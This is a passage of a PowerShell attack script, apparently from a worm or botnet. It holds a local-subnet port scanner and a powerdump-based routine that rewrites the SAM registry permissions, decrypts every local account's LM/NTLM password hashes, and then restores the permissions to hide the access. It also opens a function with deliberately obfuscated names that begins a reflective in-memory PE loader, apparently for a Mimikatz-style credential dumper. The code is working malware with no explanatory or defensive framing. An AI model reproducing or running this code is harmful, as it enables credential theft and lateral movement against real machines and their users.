$intipsub = $intiptemp[0] + "." + $intiptemp[1] + "." + $intiptemp[2]
if($ipsub -notcontains $intipsub)
{ $ipsub += $intipsub }
}
}
}catch{}
foreach($ipsub2 in $ipsub)
{
for($i=1; $i -lt 255; $i++) {
$tmpallip = $ipsub2 + "." + $i
if($localip -notcontains $tmpallip){
$ipaddr += $tmpallip
}else{}
}
}
try{
$openips = @()
$clients = @{}
$connects = @{}
foreach($ip in $ipaddr) {
$client = New-Object System.Net.Sockets.TcpClient
$connect = $client.BeginConnect($ip,$port,$null,$null)
$connects[$ip] = $connect
$clients[$ip] = $client
}
Start-Sleep -Milli 3000
foreach($ip in $clients.Keys) {
if ($clients[$ip].Connected) {
$clients[$ip].EndConnect($connects[$ip])
$openips += $ip
}
$clients[$ip].Close()
}
return $openips
}catch{ Write-Warning $_ }
}
function geth {
[CmdletBinding()]
Param (
[Switch]$PSObjectFormat
)
$script:PowerDump = $null
function LoadApi
{
$DynAssembly = New-Object System.Reflection.AssemblyName('Win32Lib')
$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32Lib', $False)
$TypeBuilder = $ModuleBuilder.DefineType('PowerDump', 'Public, Class')
$PInvokeMethod = $TypeBuilder.DefineMethod(
'RegOpenKeyEx',
[Reflection.MethodAttributes] 'Public, Static',
[int],
[Type[]] @( [int], [string], [int], [int], [int].MakeByRefType())
)
$DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
$FieldArray = [Reflection.FieldInfo[]] @(
[Runtime.InteropServices.DllImportAttribute].GetField('EntryPoint'),
[Runtime.InteropServices.DllImportAttribute].GetField('CharSet')
)
$FieldValueArray = [Object[]] @(
'RegOpenKeyEx',
[Runtime.InteropServices.CharSet]::Auto
)
$SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder(
$DllImportConstructor,
@('advapi32.dll'),
$FieldArray,
$FieldValueArray
)
$PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
$PInvokeMethod = $TypeBuilder.DefineMethod(
'RegQueryInfoKey',
[Reflection.MethodAttributes] 'Public, Static',
[int],
[Type[]] @( [int], [Text.Stringbuilder], [int].MakeByRefType(), [int], [int].MakeByRefType(), [int].MakeByRefType(), [int].MakeByRefType(), [int].MakeByRefType(), [int].MakeByRefType(), [int].MakeByRefType(), [int].MakeByRefType(), [IntPtr])
)
$DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
$FieldArray = [Reflection.FieldInfo[]] @(
[Runtime.InteropServices.DllImportAttribute].GetField('EntryPoint'),
[Runtime.InteropServices.DllImportAttribute].GetField('CallingConvention'),
[Runtime.InteropServices.DllImportAttribute].GetField('SetLastError')
)
$FieldValueArray = [Object[]] @(
'RegQueryInfoKey',
[Runtime.InteropServices.CallingConvention]::Winapi,
$true
)
$SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder(
$DllImportConstructor,
@('advapi32.dll'),
$FieldArray,
$FieldValueArray
)
$PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
$PInvokeMethod = $TypeBuilder.DefineMethod(
'RegCloseKey',
[Reflection.MethodAttributes] 'Public, Static',
[int],
[Type[]] @( [int])
)
$DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
$FieldArray = [Reflection.FieldInfo[]] @(
[Runtime.InteropServices.DllImportAttribute].GetField('EntryPoint'),
[Runtime.InteropServices.DllImportAttribute].GetField('SetLastError')
)
$FieldValueArray = [Object[]] @(
'RegCloseKey',
$true
)
$SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder(
$DllImportConstructor,
@('advapi32.dll'),
$FieldArray,
$FieldValueArray
)
$PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
################################################################################
$script:PowerDump = $TypeBuilder.CreateType()
}
#######################################powerdump written by David Kennedy#########################################
$antpassword = [Text.Encoding]::ASCII.GetBytes("NTPASSWORD`0");
$almpassword = [Text.Encoding]::ASCII.GetBytes("LMPASSWORD`0");
$empty_lm = [byte[]]@(0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee,0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee);
$empty_nt = [byte[]]@(0x31,0xd6,0xcf,0xe0,0xd1,0x6a,0xe9,0x31,0xb7,0x3c,0x59,0xd7,0xe0,0xc0,0x89,0xc0);
$odd_parity = @(
1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,
16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110,
112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,
128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143,
145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,
161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,
176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,
193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,
208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,
224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,
241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254
);
function sid_to_key($sid)
{
$c0 = $sid -band 255
$c1 = ($sid -band 65280)/256
$c2 = ($sid -band 16711680)/65536
$c3 = ($sid -band 4278190080)/16777216
$s1 = @($c0, $c1, $c2, $c3, $c0, $c1, $c2)
$s2 = @($c3, $c0, $c1, $c2, $c3, $c0, $c1)
return ,((str_to_key $s1),(str_to_key $s2))
}
function str_to_key($s)
{
$k0 = [int][math]::Floor($s[0] * 0.5)
$k1 = ( $($s[0] -band 0x01) * 64) -bor [int][math]::Floor($s[1] * 0.25)
$k2 = ( $($s[1] -band 0x03) * 32) -bor [int][math]::Floor($s[2] * 0.125)
$k3 = ( $($s[2] -band 0x07) * 16) -bor [int][math]::Floor($s[3] * 0.0625)
$k4 = ( $($s[3] -band 0x0F) * 8) -bor [int][math]::Floor($s[4] * 0.03125)
$k5 = ( $($s[4] -band 0x1F) * 4) -bor [int][math]::Floor($s[5] * 0.015625)
$k6 = ( $($s[5] -band 0x3F) * 2) -bor [int][math]::Floor($s[6] * 0.0078125)
$k7 = $($s[6] -band 0x7F)
$key = @($k0, $k1, $k2, $k3, $k4, $k5, $k6, $k7)
0..7 | %{
$key[$_] = $odd_parity[($key[$_] * 2)]
}
return ,$key
}
function NewRC4([byte[]]$key)
{
return new-object Object |
Add-Member NoteProperty key $key -PassThru |
Add-Member NoteProperty S $null -PassThru |
Add-Member ScriptMethod init {
if (-not $this.S)
{
[byte[]]$this.S = 0..255;
0..255 | % -begin{[long]$j=0;}{
$j = ($j + $this.key[$($_ % $this.key.Length)] + $this.S[$_]) % $this.S.Length;
$temp = $this.S[$_]; $this.S[$_] = $this.S[$j]; $this.S[$j] = $temp;
}
}
} -PassThru |
Add-Member ScriptMethod "encrypt" {
$data = $args[0];
$this.init();
$outbuf = new-object byte[] $($data.Length);
$S2 = $this.S[0..$this.S.Length];
0..$($data.Length-1) | % -begin{$i=0;$j=0;} {
$i = ($i+1) % $S2.Length;
$j = ($j + $S2[$i]) % $S2.Length;
$temp = $S2[$i];$S2[$i] = $S2[$j];$S2[$j] = $temp;
$a = $data[$_];
$b = $S2[ $($S2[$i]+$S2[$j]) % $S2.Length ];
$outbuf[$_] = ($a -bxor $b);
}
return ,$outbuf;
} -PassThru
}
function des_encrypt([byte[]]$data, [byte[]]$key)
{
return ,(des_transform $data $key $true)
}
function des_decrypt([byte[]]$data, [byte[]]$key)
{
return ,(des_transform $data $key $false)
}
function des_transform([byte[]]$data, [byte[]]$key, $doEncrypt)
{
$des = new-object Security.Cryptography.DESCryptoServiceProvider;
$des.Mode = [Security.Cryptography.CipherMode]::ECB;
$des.Padding = [Security.Cryptography.PaddingMode]::None;
$des.Key = $key;
$des.IV = $key;
$transform = $null;
if ($doEncrypt) {$transform = $des.CreateEncryptor();}
else{$transform = $des.CreateDecryptor();}
$result = $transform.TransformFinalBlock($data, 0, $data.Length);
return ,$result;
}
function Get-RegKeyClass([string]$key, [string]$subkey)
{
switch ($Key) {
"HKCR" { $nKey = 0x80000000} #HK Classes Root
"HKCU" { $nKey = 0x80000001} #HK Current User
"HKLM" { $nKey = 0x80000002} #HK Local Machine
"HKU" { $nKey = 0x80000003} #HK Users
"HKCC" { $nKey = 0x80000005} #HK Current Config
default {
throw "Invalid Key. Use one of the following options HKCR, HKCU, HKLM, HKU, HKCC"
}
}
$KEYQUERYVALUE = 0x1;
$KEYREAD = 0x19;
$KEYALLACCESS = 0x3F;
$result = "";
[int]$hkey=0
if (-not $script:PowerDump::RegOpenKeyEx($nkey,$subkey,0,$KEYREAD,[ref]$hkey))
{
$classVal = New-Object Text.Stringbuilder 1024
[int]$len = 1024
if (-not $script:PowerDump::RegQueryInfoKey($hkey,$classVal,[ref]$len,0,[ref]$null,[ref]$null,
[ref]$null,[ref]$null,[ref]$null,[ref]$null,[ref]$null,0))
{
$result = $classVal.ToString()
}
else
{
Write-Error "RegQueryInfoKey failed";
}
$script:PowerDump::RegCloseKey($hkey) | Out-Null
}
else
{
Write-Error "Cannot open key";
}
return $result;
}
function Get-BootKey
{
$s = [string]::Join("",$("JD","Skew1","GBG","Data" | %{Get-RegKeyClass "HKLM" "SYSTEM\CurrentControlSet\Control\Lsa\$_"}));
$b = new-object byte[] $($s.Length/2);
0..$($b.Length-1) | %{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)}
$b2 = new-object byte[] 16;
0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7 | % -begin{$i=0;}{$b2[$i]=$b[$_];$i++}
return ,$b2;
}
function Get-HBootKey
{
param([byte[]]$bootkey);
$aqwerty = [Text.Encoding]::ASCII.GetBytes("!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%`0");
$anum = [Text.Encoding]::ASCII.GetBytes("0123456789012345678901234567890123456789`0");
$k = Get-Item HKLM:\SAM\SAM\Domains\Account;
if (-not $k) {return $null}
[byte[]]$F = $k.GetValue("F");
if (-not $F) {return $null}
$rc4key = [Security.Cryptography.MD5]::Create().ComputeHash($F[0x70..0x7F] + $aqwerty + $bootkey + $anum);
$rc4 = NewRC4 $rc4key;
return ,($rc4.encrypt($F[0x80..0x9F]));
}
function Get-UserName([byte[]]$V)
{
if (-not $V) {return $null};
$offset = [BitConverter]::ToInt32($V[0x0c..0x0f],0) + 0xCC;
$len = [BitConverter]::ToInt32($V[0x10..0x13],0);
return [Text.Encoding]::Unicode.GetString($V, $offset, $len);
}
function Get-UserHashes($u, [byte[]]$hbootkey)
{
[byte[]]$enc_lm_hash = $null; [byte[]]$enc_nt_hash = $null;
# check if hashes exist (if byte memory equals to 20, then we've got a hash)
$LM_exists = $false;
$NT_exists = $false;
# LM header check
if ($u.V[0xa0..0xa3] -eq 20)
{
$LM_exists = $true;
}
# NT header check
elseif ($u.V[0xac..0xaf] -eq 20)
{
$NT_exists = $true;
}
if ($LM_exists -eq $true)
{
$lm_hash_offset = $u.HashOffset + 4;
$nt_hash_offset = $u.HashOffset + 8 + 0x10;
$enc_lm_hash = $u.V[$($lm_hash_offset)..$($lm_hash_offset+0x0f)];
$enc_nt_hash = $u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)];
}
elseif ($NT_exists -eq $true)
{
$nt_hash_offset = $u.HashOffset + 8;
$enc_nt_hash = [byte[]]$u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)];
}
return ,(DecryptHashes $u.Rid $enc_lm_hash $enc_nt_hash $hbootkey);
}
function DecryptHashes($rid, [byte[]]$enc_lm_hash, [byte[]]$enc_nt_hash, [byte[]]$hbootkey)
{
[byte[]]$lmhash = $empty_lm; [byte[]]$nthash=$empty_nt;
if ($enc_lm_hash)
{
$lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword;
}
if ($enc_nt_hash)
{
$nthash = DecryptSingleHash $rid $hbootkey $enc_nt_hash $antpassword;
}
return ,($lmhash,$nthash)
}
function DecryptSingleHash($rid,[byte[]]$hbootkey,[byte[]]$enc_hash,[byte[]]$lmntstr)
{
$deskeys = sid_to_key $rid;
$md5 = [Security.Cryptography.MD5]::Create();
$rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr);
$rc4 = NewRC4 $rc4_key;
$obfkey = $rc4.encrypt($enc_hash);
$hash = (des_decrypt $obfkey[0..7] $deskeys[0]) +
(des_decrypt $obfkey[8..$($obfkey.Length - 1)] $deskeys[1]);
return ,$hash;
}
function Get-UserKeys
{
ls HKLM:\SAM\SAM\Domains\Account\Users |
where {$_.PSChildName -match "^[0-9A-Fa-f]{8}$"} |
Add-Member AliasProperty KeyName PSChildName -PassThru |
Add-Member ScriptProperty Rid {[Convert]::ToInt32($this.PSChildName, 16)} -PassThru |
Add-Member ScriptProperty V {[byte[]]($this.GetValue("V"))} -PassThru |
Add-Member ScriptProperty UserName {Get-UserName($this.GetValue("V"))} -PassThru |
Add-Member ScriptProperty HashOffset {[BitConverter]::ToUInt32($this.GetValue("V")[0x9c..0x9f],0) + 0xCC} -PassThru
}
function DumpHashes
{
LoadApi
$bootkey = Get-BootKey;
$hbootKey = Get-HBootKey $bootkey;
Get-UserKeys | %{
$hashes = Get-UserHashes $_ $hBootKey;
if($PSObjectFormat)
{
$creds = New-Object psobject
$creds | Add-Member -MemberType NoteProperty -Name Name -Value $_.Username
$creds | Add-Member -MemberType NoteProperty -Name id -Value $_.Rid
$creds | Add-Member -MemberType NoteProperty -Name lm -Value ([BitConverter]::ToString($hashes[0])).Replace("-","").ToLower()
$creds | Add-Member -MemberType NoteProperty -Name ntlm -Value ([BitConverter]::ToString($hashes[1])).Replace("-","").ToLower()
$creds
}
else
{
"{0}:{1}:{2}:{3}:::" -f ($_.UserName,$_.Rid,
[BitConverter]::ToString($hashes[0]).Replace("-","").ToLower(),
[BitConverter]::ToString($hashes[1]).Replace("-","").ToLower());
}
}
}
if (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator"))
{
Return
}
else
{
$rule = New-Object System.Security.AccessControl.RegistryAccessRule (
[System.Security.Principal.WindowsIdentity]::GetCurrent().Name,
"FullControl",
[System.Security.AccessControl.InheritanceFlags]"ObjectInherit,ContainerInherit",
[System.Security.AccessControl.PropagationFlags]"None",
[System.Security.AccessControl.AccessControlType]"Allow")
$key = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey(
"SAM\SAM\Domains",
[Microsoft.Win32.RegistryKeyPermissionCheck]::ReadWriteSubTree,
[System.Security.AccessControl.RegistryRights]::ChangePermissions)
$acl = $key.GetAccessControl()
$acl.SetAccessRule($rule)
$key.SetAccessControl($acl)
DumpHashes
$user = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
$acl.Access | where {$_.IdentityReference.Value -eq $user} | %{$acl.RemoveAccessRule($_)} | Out-Null
Set-Acl HKLM:\SAM\SAM\Domains $acl
}
}
function Invoke-Mypass
{
[CmdletBinding(DefaultParameterSetName="Dumpbred")]
Param(
[Parameter(Position = 0)]
[String[]]
$ComputerName,
[Parameter(ParameterSetName = "Dumpbred", Position = 1)]
[Switch]
$Dumpbred,
[Parameter(ParameterSetName = "Goingbots", Position = 1)]
[Switch]
$Goingbots,
[Parameter(ParameterSetName = "CustomCommand", Position = 1)]
[String]
$Command
)
Set-StrictMode -Version 2
$LSHDUGF = {
[CmdletBinding()]
Param(
[Parameter(Position = 0, Mandatory = $true)]
[String]
$PPSDHKDSDBytSHDSDes32,
[Parameter(Position = 1, Mandatory = $true)]
[String]
$PPSDHKDSDBytes32,
[Parameter(Position = 2, Mandatory = $false)]
[String]
$FuncReturnType,
[Parameter(Position = 3, Mandatory = $false)]
[Int32]
$ProcId,
[Parameter(Position = 4, Mandatory = $false)]
[String]
$ProcName,
[Parameter(Position = 5, Mandatory = $false)]
[String]
$EAIUFHS
)
Function LGDJSR
{
$DJH32H = New-Object System.Object
$Domain = [AppDomain]::CurrentDomain
$DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly')
$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false)
$ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]
$LHFSser = $ModuleBuilder.DefineEnum('MachineType', 'Public', [UInt16])
$LHFSser.DefineLiteral('Native', [UInt16] 0) | Out-Null
$LHFSser.DefineLiteral('I386', [UInt16] 0x014c) | Out-Null
$LHFSser.DefineLiteral('Itanium', [UInt16] 0x0200) | Out-Null
$LHFSser.DefineLiteral('x64', [UInt16] 0x8664) | Out-Null
$MachineType = $LHFSser.CreateType()
$DJH32H | Add-Member -MemberType NoteProperty -Name MachineType -Value $MachineType
$LHFSser = $ModuleBuilder.DefineEnum('MagicType', 'Public', [UInt16])
$LHFSser.DefineLiteral('IMAGE_NT_OPTIONAL_HDR32_MAGIC', [UInt16] 0x10b) | Out-Null
$LHFSser.DefineLiteral('IMAGE_NT_OPTIONAL_HDR64_MAGIC', [UInt16] 0x20b) | Out-Null
$MagicType = $LHFSser.CreateType()
$DJH32H | Add-Member -MemberType NoteProperty -Name MagicType -Value $MagicType
$LHFSser = $ModuleBuilder.DefineEnum('SubSystemType', 'Public', [UInt16])
$LHFSser.DefineLiteral('IMAGE_SUBSYSTEM_UNKNOWN', [UInt16] 0) | Out-Null
$LHFSser.DefineLiteral('IMAGE_SUBSYSTEM_NATIVE', [UInt16] 1) | Out-Null
$LHFSser.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_GUI', [UInt16] 2) | Out-Null
$LHFSser.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CUI', [UInt16] 3) | Out-Null
$LHFSser.DefineLiteral('IMAGE_SUBSYSTEM_POSIX_CUI', [UInt16] 7) | Out-Null
$LHFSser.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CE_GUI', [UInt16] 9) | Out-Null
$LHFSser.DefineLiteral('IMAGE_SUBSYSTEM_EFI_APPLICATION', [UInt16] 10) | Out-Null
$LHFSser.DefineLiteral('IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER', [UInt16] 11) | Out-Null
$LHFSser.DefineLiteral('IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER', [UInt16] 12) | Out-Null
$LHFSser.DefineLiteral('IMAGE_SUBSYSTEM_EFI_ROM', [UInt16] 13) | Out-Null
$LHFSser.DefineLiteral('IMAGE_SUBSYSTEM_XBOX', [UInt16] 14) | Out-Null
$SubSystemType = $LHFSser.CreateType()
$DJH32H | Add-Member -MemberType NoteProperty -Name SubSystemType -Value $SubSystemType
$LHFSser = $ModuleBuilder.DefineEnum('DllCharacteristicsType', 'Public', [UInt16])
$LHFSser.DefineLiteral('RES_0', [UInt16] 0x0001) | Out-Null
$LHFSser.DefineLiteral('RES_1', [UInt16] 0x0002) | Out-Null
$LHFSser.DefineLiteral('RES_2', [UInt16] 0x0004) | Out-Null
$LHFSser.DefineLiteral('RES_3', [UInt16] 0x0008) | Out-Null
$LHFSser.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE', [UInt16] 0x0040) | Out-Null
$LHFSser.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_FORCE_INTEGRITY', [UInt16] 0x0080) | Out-Null
$LHFSser.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_NX_COMPAT', [UInt16] 0x0100) | Out-Null
$LHFSser.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_ISOLATION', [UInt16] 0x0200) | Out-Null
$LHFSser.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_SEH', [UInt16] 0x0400) | Out-Null
$LHFSser.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_BIND', [UInt16] 0x0800) | Out-Null
$LHFSser.DefineLiteral('RES_4', [UInt16] 0x1000) | Out-Null
$LHFSser.DefineLiteral('IMAGE_DLLCHARACTERISTICS_WDM_DRIVER', [UInt16] 0x2000) | Out-Null
$LHFSser.DefineLiteral('IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE', [UInt16] 0x8000) | Out-Null
$DllCharacteristicsType = $LHFSser.CreateType()
$DJH32H | Add-Member -MemberType NoteProperty -Name DllCharacteristicsType -Value $DllCharacteristicsType
$KSHDSDHA_a = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
$LHFSser = $ModuleBuilder.DefineType('IMAGE_DATA_DIRECTORY', $KSHDSDHA_a, [System.ValueType], 8)
($LHFSser.DefineField('VirtualAddress', [UInt32], 'Public')).SetOffset(0) | Out-Null
($LHFSser.DefineField('Size', [UInt32], 'Public')).SetOffset(4) | Out-Null
$IMAGE_DATA_DIRECTORY = $LHFSser.CreateType()
$DJH32H | Add-Member -MemberType NoteProperty -Name IMAGE_DATA_DIRECTORY -Value $IMAGE_DATA_DIRECTORY
$KSHDSDHA_a = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
$LHFSser = $ModuleBuilder.DefineType('IMAGE_FILE_HEADER', $KSHDSDHA_a, [System.ValueType], 20)
$LHFSser.DefineField('Machine', [UInt16], 'Public') | Out-Null
$LHFSser.DefineField('NumberOfSections', [UInt16], 'Public') | Out-Null
$LHFSser.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
$LHFSser.DefineField('PointerToSymbolTable', [UInt32], 'Public') | Out-Null
$LHFSser.DefineField('NumberOfSymbols', [UInt32], 'Public') | Out-Null
$LHFSser.DefineField('SizeOfOptionalHeader', [UInt16], 'Public') | Out-Null
$LHFSser.DefineField('Characteristics', [UInt16], 'Public') | Out-Null
$IMAGE_FILE_HEADER = $LHFSser.CreateType()
$DJH32H | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_HEADER -Value $IMAGE_FILE_HEADER
$KSHDSDHA_a = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
$LHFSser = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER64', $KSHDSDHA_a, [System.ValueType], 240)
($LHFSser.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null
($LHFSser.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null
($LHFSser.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null
($LHFSser.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null
($LHFSser.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null
($LHFSser.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null
($LHFSser.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null
($LHFSser.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null
($LHFSser.DefineField('ImageBase', [UInt64], 'Public')).SetOffset(24) | Out-Null
($LHFSser.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null
($LHFSser.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null
($LHFSser.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null
($LHFSser.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null
($LHFSser.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null
($LHFSser.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null
($LHFSser.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null
($LHFSser.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null
($LHFSser.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null
($LHFSser.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null
($LHFSser.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null
($LHFSser.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null
($LHFSser.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null
($LHFSser.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null
($LHFSser.DefineField('SizeOfStackReserve', [UInt64], 'Public')).SetOffset(72) | Out-Null
($LHFSser.DefineField('SizeOfStackCommit', [UInt64], 'Public')).SetOffset(80) | Out-Null
($LHFSser.DefineField('SizeOfHeapReserve', [UInt64], 'Public')).SetOffset(88) | Out-Null
($LHFSser.DefineField('SizeOfHeapCommit', [UInt64], 'Public')).SetOffset(96) | Out-Null
($LHFSser.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(104) | Out-Null
($LHFSser.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(108) | Out-Null
($LHFSser.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null
($LHFSser.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null
($LHFSser.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null
($LHFSser.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null
($LHFSser.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null
($LHFSser.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null
($LHFSser.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null
($LHFSser.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null
($LHFSser.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null
($LHFSser.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null
($LHFSser.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null
($LHFSser.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null
($LHFSser.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null
($LHFSser.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null
($LHFSser.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(224) | Out-Null
($LHFSser.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(232) | Out-Null
$IMAGE_OPTIONAL_HEADER64 = $LHFSser.CreateType()
$DJH32H | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER64 -Value $IMAGE_OPTIONAL_HEADER64
$KSHDSDHA_a = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
$LHFSser = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER32', $KSHDSDHA_a, [System.ValueType], 224)
($LHFSser.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null
($LHFSser.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null
($LHFSser.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null
($LHFSser.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null
($LHFSser.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null
($LHFSser.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null
($LHFSser.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null
($LHFSser.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null
($LHFSser.DefineField('BaseOfData', [UInt32], 'Public')).SetOffset(24) | Out-Null
($LHFSser.DefineField('ImageBase', [UInt32], 'Public')).SetOffset(28) | Out-Null
($LHFSser.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null
($LHFSser.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null
($LHFSser.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null
($LHFSser.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null
